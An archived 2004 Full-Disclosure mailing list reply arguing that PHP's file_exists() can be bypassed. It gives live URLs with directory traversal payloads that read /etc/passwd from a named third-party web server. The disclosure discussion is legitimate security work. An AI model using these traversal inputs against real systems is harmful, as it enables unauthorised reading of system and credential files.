lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
From: lostnoobs at security-challenge.com (Nourredine Himeur) Subject: RE: file_exists() bypassing , critical problem ? Hi, It depends of your php configuration... (but it's not a vulnerability so ..... i can say you what's the configuration is good ,because firstly nobody listen me and secondly php-group are blind and deaf) look this : http://lists.netsys.com/pipermail/full-disclosure/2004-February/016612.html http://www.opensavoir.com/test.txt http://www.opensavoir.com/test.php http://www.opensavoir.com/test.php?page=../../../../../../../../../../etc/pa sswd but it's not a vulnerability HA ! HA ! HA ! show this : http://www.opensavoir.com/test.php?page=./anything/../../../../../../../../. ./../etc/passwd :) Nourredine Himeur www.security-challenge.com